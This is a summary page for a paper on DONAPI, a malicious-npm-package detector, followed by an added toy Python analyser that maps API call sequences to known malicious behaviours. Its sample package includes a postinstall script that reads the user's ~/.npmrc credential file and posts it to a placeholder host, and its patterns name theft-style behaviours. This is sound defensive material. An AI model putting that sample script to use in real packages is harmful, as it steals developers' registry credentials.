DONAPI: Malicious NPM Packages Detector using Behavior Sequence Knowledge Mapping
Cheng Huang (1), Nannan Wang (1), Ziyan Wang (1), Siqi Sun (1), Lingzi Li (1), Junren Chen (1), Qianchong Zhao (1), Jiaxuan Han (1), Zhen Yang (1), Lei Shi (2) ((1) Sichuan University, (2) Huawei Technologies)

TL;DR
DONAPI is a novel system that combines static and dynamic analysis to detect malicious npm packages by analyzing behavior sequences and knowledge mapping, significantly improving security in the npm ecosystem.
Contribution
It introduces a hierarchical classification framework and behavior knowledge base for malicious package detection, integrating static code analysis with dynamic API call sequence analysis.
Findings
Identified 325 malicious npm packages
Discovered 2 new API calls and 246 API call sequences
Enhanced detection accuracy through behavior knowledge mapping
Abstract
With the growing popularity of modularity in software development comes the rise of package managers and language ecosystems. Among them, npm stands out as the most extensive package manager, hosting more than 2 million third-party open-source packages that greatly simplify the process of building code. However, this openness also brings security risks, as evidenced by numerous package poisoning incidents. In this paper, we synchronize a local package cache containing more than 3.4 million packages in near real-time to give us access to more package code details. Further, we perform manual inspection and API call sequence analysis on packages collected from public datasets and security reports to build a hierarchical classification framework and behavioral knowledge base covering different sensitive behaviors. In addition, we propose the DONAPI, an automatic malicious npm packages…
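To make the static half of the approach concrete, the following is an added toy example (not code from the DONAPI paper or its authors). It extracts sensitive Node.js API calls from a package's files in source order, records the ordered call sequence, and maps that sequence against a small behaviour knowledge base; it also flags install-time hooks in package.json, since those are the usual entry point for such scripts. The API list, the behaviour entries and the sample package are all constructed stand-ins, not the paper's taxonomy or its dataset.

```python
"""Toy static API-call-sequence analyser for an npm package.

Added example, not code from the DONAPI paper: it sketches the static side of
the approach the abstract describes (extract sensitive API calls in source
order, then map the ordered sequence against a behaviour knowledge base).
The API patterns and the knowledge base are constructed stand-ins.
"""
import json
import re
from typing import Dict, List, Tuple

# Sensitive Node.js APIs worth recording (constructed subset; labels are ours).
SENSITIVE_APIS: Dict[str, re.Pattern] = {
    "fs.read":     re.compile(r"\bfs\.readFile(?:Sync)?\s*\("),
    "fs.write":    re.compile(r"\bfs\.writeFile(?:Sync)?\s*\("),
    "os.identity": re.compile(r"\bos\.(?:hostname|userInfo|homedir)\s*\("),
    "net.request": re.compile(r"\bhttps?\.(?:request|get)\s*\("),
    "process.env": re.compile(r"\bprocess\.env\b"),
    "child.exec":  re.compile(r"\b(?:child_process\.)?(?:exec|execSync|spawn)\s*\("),
}
# A bare exec()/spawn() only counts if child_process was actually imported.
CHILD_PROCESS_IMPORT = re.compile(r"""require\(\s*['"]child_process['"]\s*\)""")

# Behaviour knowledge base (constructed): ordered API sequence -> behaviour label.
BEHAVIOUR_KB: List[Tuple[List[str], str]] = [
    (["fs.read", "net.request"], "local file read followed by outbound network send"),
    (["os.identity", "net.request"], "host fingerprint sent over the network"),
    (["process.env", "net.request"], "environment variables sent over the network"),
    (["net.request", "fs.write", "child.exec"], "download, write to disk, then execute"),
]
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def extract_sequence(js_source: str) -> List[str]:
    """Return the sensitive API names in the order they appear in the source."""
    hits = []
    has_child_process = bool(CHILD_PROCESS_IMPORT.search(js_source))
    for name, pattern in SENSITIVE_APIS.items():
        if name == "child.exec" and not has_child_process:
            continue
        for match in pattern.finditer(js_source):
            hits.append((match.start(), name))
    return [name for _, name in sorted(hits)]


def is_subsequence(pattern: List[str], seq: List[str]) -> bool:
    """True if every element of pattern occurs in seq, in the same relative order."""
    it = iter(seq)
    return all(any(p == s for s in it) for p in pattern)


def map_behaviours(seq: List[str]) -> List[str]:
    """Map an ordered call sequence to every knowledge-base behaviour it contains."""
    return [label for pattern, label in BEHAVIOUR_KB if is_subsequence(pattern, seq)]


def analyse_package(files: Dict[str, str]) -> Dict[str, object]:
    """files maps a relative path to its contents (package.json plus JS files)."""
    report: Dict[str, object] = {"install_hooks": {}, "sequences": {}, "behaviours": []}
    manifest = json.loads(files.get("package.json", "{}"))
    for hook in INSTALL_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if cmd:
            report["install_hooks"][hook] = cmd
    for path, src in files.items():
        if path.endswith(".js"):
            seq = extract_sequence(src)
            report["sequences"][path] = seq
            for label in map_behaviours(seq):
                report["behaviours"].append(f"{path}: {label}")
    if report["install_hooks"] and report["behaviours"]:
        report["behaviours"].append("sensitive behaviour reachable from an install hook")
    return report


# Constructed sample package: a postinstall script that reads a credential file
# and posts it together with the hostname. Hostname 'example.invalid' is a placeholder.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-pkg", "version": "1.0.0",
        "scripts": {"postinstall": "node index.js"},
    }),
    "index.js": (
        "const fs = require('fs');\n"
        "const os = require('os');\n"
        "const https = require('https');\n"
        "const data = fs.readFileSync(os.homedir() + '/.npmrc', 'utf8');\n"
        "const body = JSON.stringify({host: os.hostname(), data});\n"
        "const req = https.request({hostname: 'example.invalid', method: 'POST'});\n"
        "req.end(body);\n"
    ),
}

if __name__ == "__main__":
    print(json.dumps(analyse_package(SAMPLE_PACKAGE), indent=2))
```

Running it on the sample prints the ordered sequence for index.js (file read, two identity lookups, then a network request), the two matching behaviour entries, and the note that this behaviour is reachable from a postinstall hook. Regex matching is deliberately simple: it misses aliased or dynamically built calls, which is exactly the gap the paper's dynamic API call tracing is meant to close.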
Taxonomy
Topics: Network Security and Intrusion Detection · Advanced Malware Detection Techniques · Spam and Phishing Detection
